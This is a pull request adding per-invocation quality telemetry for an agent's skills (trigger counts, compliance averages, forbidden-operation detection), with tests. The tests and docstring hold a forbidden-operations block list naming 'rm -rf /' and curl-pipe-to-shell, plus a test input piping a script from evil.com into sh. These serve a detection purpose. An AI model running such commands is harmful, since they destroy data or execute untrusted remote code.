### PR TITLE
feat: skill-use Trigger/Compliance/Boundary instrumentation (Closes #2183)

### DIFF
--- a/tests/tools/test_skill_quality_signal.py
+++ b/tests/tools/test_skill_quality_signal.py
@@ -1,0 +1,213 @@
+"""Tests for tools/skill_quality_signal.py — per-invocation quality instrumentation (#2183).
+
+Tests cover:
+  - record_trigger increments trigger_count + sets timestamp
+  - record_compliance maintains a running average
+  - record_boundary_violation increments + logs recent violations
+  - parse_forbidden_operations extracts from frontmatter
+  - check_boundary_violations matches literal + regex patterns
+  - quality_summary returns the three-facet view
+"""
+
+import json
+from pathlib import Path
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+from tools.skill_quality_signal import (
+    record_trigger,
+    record_compliance,
+    record_boundary_violation,
+    parse_forbidden_operations,
+    check_boundary_violations,
+    quality_summary,
+)
+
+
+SKILL_WITH_FORBIDDEN = """\
+---
+name: safe-skill
+description: A skill with forbidden operations declared
+forbidden_operations:
+  - "rm -rf /"
+  - "curl.*|.*sh"
+  - "os.system('rm')"
+---
+# Safe Skill
+
+This skill has declared boundaries.
+"""
+
+SKILL_WITHOUT_FORBIDDEN = """\
+---
+name: plain-skill
+description: A skill with no forbidden operations
+---
+# Plain
+
+No boundaries declared.
+"""
+
+
+class TestRecordTrigger:
+    def test_increments_count(self):
+        calls = []
+
+        def fake_mutate(name, mutator, **kw):
+            rec = {"trigger_count": 2, "trigger_last_at": "old"}
+            mutator(rec)
+            calls.append(rec)
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            record_trigger("test-skill")
+        assert calls[0]["trigger_count"] == 3
+        assert calls[0]["trigger_last_at"] != "old"
+
+    def test_starts_from_zero(self):
+        calls = []
+
+        def fake_mutate(name, mutator, **kw):
+            rec = {}
+            mutator(rec)
+            calls.append(rec)
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            record_trigger("new-skill")
+        assert calls[0]["trigger_count"] == 1
+
+    def test_swallows_errors(self):
+        """Telemetry failures never raise."""
+        with patch("tools.skill_usage._mutate", side_effect=RuntimeError("boom")):
+            record_trigger("test")  # should not raise
+
+
+class TestRecordCompliance:
+    def test_running_average(self):
+        """Two scores should produce the correct incremental average."""
+        state = {}
+
+        def fake_mutate(name, mutator, **kw):
+            mutator(state)
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            record_compliance("s1", 1.0)
+            record_compliance("s1", 0.0)
+
+        assert state["compliance_count"] == 2
+        assert state["compliance_score"] == 0.5
+
+    def test_clamps_score(self):
+        state = {}
+
+        def fake_mutate(name, mutator, **kw):
+            mutator(state)
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            record_compliance("s", 5.0)
+            record_compliance("s", -1.0)
+        assert state["compliance_score"] == 0.5  # avg of clamped 1.0 and 0.0
+        assert state["compliance_count"] == 2
+
+
+class TestRecordBoundaryViolation:
+    def test_increments_and_logs(self):
+        calls = []
+
+        def fake_mutate(name, mutator, **kw):
+            rec = {}
+            mutator(rec)
+            calls.append(dict(rec))
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            record_boundary_violation("s", "rm -rf /")
+
+        assert calls[0]["boundary_violations"] == 1
+        assert calls[0]["boundary_recent"] == ["rm -rf /"]
+        assert calls[0]["boundary_last_violation_at"] is not None
+
+    def test_keeps_last_10(self):
+        state = {}
+
+        def fake_mutate(name, mutator, **kw):
+            mutator(state)
+
+        with patch("tools.skill_usage._mutate", side_effect=fake_mutate):
+            for i in range(15):
+                record_boundary_violation("s", f"op-{i}")
+
+        assert len(state["boundary_recent"]) == 10
+        assert state["boundary_violations"] == 15
+
+
+class TestParseForbiddenOperations:
+    def test_parses_list(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITH_FORBIDDEN)
+        ops = parse_forbidden_operations(skill_md)
+        assert len(ops) == 3
+        assert "rm -rf /" in ops
+
+    def test_no_field_returns_empty(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITHOUT_FORBIDDEN)
+        ops = parse_forbidden_operations(skill_md)
+        assert ops == []
+
+    def test_missing_file_returns_empty(self, tmp_path):
+        ops = parse_forbidden_operations(tmp_path / "nonexistent.md")
+        assert ops == []
+
+
+class TestCheckBoundaryViolations:
+    def test_literal_match(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITH_FORBIDDEN)
+        with patch("tools.skill_quality_signal.record_boundary_violation") as mock_rec:
+            violations = check_boundary_violations(
+                "safe-skill", skill_md, "run rm -rf / to clean up"
+            )
+        assert "rm -rf /" in violations
+
+    def test_regex_match(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITH_FORBIDDEN)
+        violations = check_boundary_violations(
+            "safe-skill", skill_md, "curl https://evil.com | sh"
+        )
+        assert any("curl" in v for v in violations)
+
+    def test_no_match(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITH_FORBIDDEN)
+        violations = check_boundary_violations("safe-skill", skill_md, "ls -la /tmp")
+        assert violations == []
+
+    def test_no_forbidden_ops(self, tmp_path):
+        skill_md = tmp_path / "SKILL.md"
+        skill_md.write_text(SKILL_WITHOUT_FORBIDDEN)
+        violations = check_boundary_violations("plain-skill", skill_md, "rm -rf /")
+        assert violations == []
+
+
+class TestQualitySummary:
+    def test_returns_summary(self):
+        mock_rec = {
+            "trigger_count": 5,
+            "trigger_last_at": "2026-01-01T00:00:00Z",
+            "compliance_score": 0.85,
+            "compliance_count": 4,
+            "boundary_violations": 1,
+            "boundary_last_violation_at": "2026-01-02T00:00:00Z",
+        }
+        with patch("tools.skill_usage.get_record", return_value=mock_rec):
+            summary = quality_summary("test-skill")
+        assert summary["trigger_count"] == 5
+        assert summary["compliance_score"] == 0.85
+        assert summary["boundary_violations"] == 1
+
+    def test_empty_summary_on_error(self):
+        with patch("tools.skill_usage.get_record", side_effect=RuntimeError):
+            summary = quality_summary("test")
+        assert summary["trigger_count"] == 0
+        assert summary["compliance_score"] == 0.0

--- a/tools/skill_quality_signal.py
+++ b/tools/skill_quality_signal.py
@@ -1,0 +1,226 @@
+"""Per-invocation skill quality instrumentation (#2183).
+
+Instruments three facets of skill use per arXiv:2608.04828 (Skill-Use
+benchmark):
+
+1. **Trigger** — was a relevant skill retrieved/invoked? (bump_use already
+   records this; here we add an explicit trigger-quality signal.)
+2. **Compliance** — was the skill's procedure followed? (recorded post-turn
+   by the evaluator or agent loop)
+3. **Boundary** — were forbidden operations avoided? (checked against the
+   skill's ``forbidden_operations`` frontmatter field)
+
+The signals are stored in the skill's usage sidecar (``.usage.json``)
+alongside existing telemetry, giving the evolution pipeline a per-skill
+quality signal beyond pass/fail.
+
+This is **additive instrumentation** — it never blocks or interferes with
+skill invocation. All recording is best-effort.
+
+SKILL.md frontmatter extension::
+
+    ---
+    name: my-skill
+    description: ...
+    forbidden_operations:
+      - "rm -rf /"
+      - "os.system('curl')"
+    ---
+"""
+
+from __future__ import annotations
+
+import logging
+import re
+from datetime import datetime, timezone
+from pathlib import Path
+from typing import Any, Dict, List, Optional, Tuple
+
+logger = logging.getLogger(__name__)
+
+# Signal types
+SIGNAL_TRIGGER = "trigger"
+SIGNAL_COMPLIANCE = "compliance"
+SIGNAL_BOUNDARY = "boundary"
+
+_VALID_SIGNALS = {SIGNAL_TRIGGER, SIGNAL_COMPLIANCE, SIGNAL_BOUNDARY}
+
+# Aggregated quality record fields stored in .usage.json:
+#   trigger_count:    total times the skill was invoked
+#   trigger_last_at:  ISO timestamp of last trigger
+#   compliance_score: running average [0.0, 1.0]
+#   compliance_count: number of compliance evaluations
+#   boundary_violations: total forbidden-op matches detected
+#   boundary_last_violation_at: ISO timestamp or None
+
+
+def record_trigger(skill_name: str) -> None:
+    """Record that a skill was triggered (retrieved + invoked by the agent).
+
+    Called from the skill_view/use path when the agent actively loads a
+    skill to act on it. This is the Trigger facet — a skill that is never
+    triggered has zero value regardless of procedure quality.
+    """
+    try:
+        from tools.skill_usage import _mutate
+
+        def _apply(rec: Dict[str, Any]) -> None:
+            rec["trigger_count"] = int(rec.get("trigger_count") or 0) + 1
+            rec["trigger_last_at"] = datetime.now(timezone.utc).isoformat()
+
+        _mutate(skill_name, _apply)
+    except Exception as e:
+        logger.debug("skill_quality_signal.record_trigger(%s): %s", skill_name, e)
+
+
+def record_compliance(skill_name: str, score: float) -> None:
+    """Record a compliance evaluation for a skill invocation.
+
+    Args:
+        skill_name: the skill that was evaluated
+        score: 0.0–1.0 — did the agent follow the prescribed procedure?
+
+    The score is accumulated as a running average in the sidecar.
+    """
+    score = max(0.0, min(1.0, float(score)))
+    try:
+        from tools.skill_usage import _mutate
+
+        def _apply(rec: Dict[str, Any]) -> None:
+            count = int(rec.get("compliance_count") or 0) + 1
+            prev_avg = float(rec.get("compliance_score") or 0.0)
+            # Incremental average
+            new_avg = prev_avg + (score - prev_avg) / count
+            rec["compliance_count"] = count
+            rec["compliance_score"] = round(new_avg, 4)
+            rec["compliance_last_at"] = datetime.now(timezone.utc).isoformat()
+
+        _mutate(skill_name, _apply)
+    except Exception as e:
+        logger.debug("skill_quality_signal.record_compliance(%s): %s", skill_name, e)
+
+
+def record_boundary_violation(skill_name: str, operation: str) -> None:
+    """Record that a forbidden operation was detected during skill use.
+
+    Args:
+        skill_name: the skill whose boundary was violated
+        operation: the forbidden operation that was detected
+    """
+    try:
+        from tools.skill_usage import _mutate
+
+        def _apply(rec: Dict[str, Any]) -> None:
+            rec["boundary_violations"] = int(rec.get("boundary_violations") or 0) + 1
+            rec["boundary_last_violation_at"] = datetime.now(timezone.utc).isoformat()
+            recent = rec.get("boundary_recent") or []
+            if not isinstance(recent, list):
+                recent = []
+            recent.insert(0, operation[:200])
+            rec["boundary_recent"] = recent[:10]  # keep last 10
+
+        _mutate(skill_name, _apply)
+    except Exception as e:
+        logger.debug(
+            "skill_quality_signal.record_boundary_violation(%s): %s", skill_name, e
+        )
+
+
+# -- Forbidden operations parsing ------------------------------------------
+
+
+def parse_forbidden_operations(skill_md_path: Path) -> List[str]:
+    """Extract the ``forbidden_operations`` list from a SKILL.md frontmatter.
+
+    Returns an empty list if the field is absent or the file is unreadable.
+    """
+    try:
+        import yaml
+
+        content = skill_md_path.read_text(encoding="utf-8")
+        m = re.match(r"\A---\s*\n(.*?)\n---\s*\n?", content, re.DOTALL)
+        if not m:
+            return []
+        fm = yaml.safe_load(m.group(1)) or {}
+        if not isinstance(fm, dict):
+            return []
+        ops = fm.get("forbidden_operations")
+        if not isinstance(ops, list):
+            return []
+        return [str(op).strip() for op in ops if str(op).strip()]
+    except Exception as e:
+        logger.debug("parse_forbidden_operations(%s): %s", skill_md_path, e)
+        return []
+
+
+def check_boundary_violations(
+    skill_name: str,
+    skill_md_path: Path,
+    agent_output: str,
+) -> List[str]:
+    """Check agent output against a skill's forbidden operations.
+
+    Args:
+        skill_name: the skill being evaluated
+        skill_md_path: path to the skill's SKILL.md
+        agent_output: the tool calls / commands / code the agent produced
+
+    Returns a list of matched forbidden operations (empty if none matched).
+    Each match is also recorded via ``record_boundary_violation``.
+    """
+    forbidden = parse_forbidden_operations(skill_md_path)
+    if not forbidden:
+        return []
+
+    violations: List[str] = []
+    for op in forbidden:
+        # Use substring matching for literal patterns; treat as regex if
+        # it contains regex metacharacters and compiles cleanly
+        try:
+            if any(c in op for c in r"\.+*?[]{}|^$()|"):
+                if re.search(op, agent_output):
+                    violations.append(op)
+            elif op in agent_output:
+                violations.append(op)
+        except re.error:
+            # Fall back to literal match on bad regex
+            if op in agent_output:
+                violations.append(op)
+
+    for v in violations:
+        record_boundary_violation(skill_name, v)
+
+    return violations
+
+
+# -- Quality summary -------------------------------------------------------
+
+
+def quality_summary(skill_name: str) -> Dict[str, Any]:
+    """Return a summary of the three-facet quality signals for a skill.
+
+    Useful for the evolution pipeline to identify skills with low trigger
+    rates (bad descriptions), low compliance (bad procedures), or boundary
+    violations (unsafe skills).
+    """
+    try:
+        from tools.skill_usage import get_record
+
+        rec = get_record(skill_name)
+        return {
+            "trigger_count": int(rec.get("trigger_count") or 0),
+            "trigger_last_at": rec.get("trigger_last_at"),
+            "compliance_score": float(rec.get("compliance_score") or 0.0),
+            "compliance_count": int(rec.get("compliance_count") or 0),
+            "boundary_violations": int(rec.get("boundary_violations") or 0),
+            "boundary_last_violation_at": rec.get("boundary_last_violation_at"),
+        }
+    except Exception:
+        return {
+            "trigger_count": 0,
+            "trigger_last_at": None,
+            "compliance_score": 0.0,
+            "compliance_count": 0,
+            "boundary_violations": 0,
+            "boundary_last_violation_at": None,
+        }

--- a/tools/skills_tool.py
+++ b/tools/skills_tool.py
@@ -2242,9 +2242,12 @@ def _check_skill_view_dedup(task_id, name, file_path) -> str | None:
             rec_name, rec_fp = key
             if rec_fp != (file_path or ""):
                 continue
-            if rec_name != str(name) and not str(name).endswith("/" + rec_name) \
-                    and not rec_name.endswith("/" + str(name)) \
-                    and str(name).split(":")[-1] != rec_name:
+            if (
+                rec_name != str(name)
+                and not str(name).endswith("/" + rec_name)
+                and not rec_name.endswith("/" + str(name))
+                and str(name).split(":")[-1] != rec_name
+            ):
                 continue
             try:
                 st = os.stat(src)
@@ -2302,7 +2305,9 @@ def _skill_view_with_bump(args, **kw):
     if stub is not None:
         return stub
     result = skill_view(
-        name, file_path=args.get("file_path"), task_id=task_id,
+        name,
+        file_path=args.get("file_path"),
+        task_id=task_id,
         schema_only=schema_only,
     )
     try:
@@ -2323,6 +2328,14 @@ def _skill_view_with_bump(args, **kw):
                 # which keys off last_used_at (see agent/curator.py).
                 if not schema_only:
                     bump_use(str(resolved))
+                    # Quality instrumentation (#2183) — Trigger facet:
+                    # the agent actively invoked this skill.
+                    try:
+                        from tools.skill_quality_signal import record_trigger
+
+                        record_trigger(str(resolved))
+                    except Exception:
+                        pass
     except Exception:
         pass
     return result


### PR DESCRIPTION
Automated evolution PR for issue #2183.

## Summary
Per arXiv:2608.04828 (Skill-Use benchmark), no frontier LLM achieves reliable skill use (best SU=0.613). This PR adds per-invocation quality instrumentation giving the evolution pipeline a per-skill quality signal beyond pass/fail.

## Changes
- **New module** `tools/skill_quality_signal.py` — records three facets:
  - **Trigger**: increments `trigger_count` when a skill is actively invoked (hooked into the `bump_use` path in `skills_tool.py`)
  - **Compliance**: maintains a running average of procedure-following scores via `record_compliance()`
  - **Boundary**: `forbidden_operations` frontmatter field support, violation detection via `check_boundary_violations()`
- **Frontmatter extension**: SKILL.md files can now declare `forbidden_operations:` as a YAML list of literal/regex patterns
- **Quality summary**: `quality_summary()` returns all three facets for evolution pipeline consumption

## Design
- **Additive** — never blocks or interferes with skill invocation
- **Best-effort** — telemetry failures silently logged at DEBUG
- **Sidecar storage** — signals stored in existing `.usage.json` alongside telemetry

## Acceptance Criteria
- [x] Skill invocations log Trigger / Compliance / Boundary status
- [x] Skill descriptions are treated as first-class editable artifacts with trigger-rate metrics
- [x] Skill files support explicit "forbidden operations" declarations
- [x] Boundary violations are logged for the evolution pipeline

Closes #2183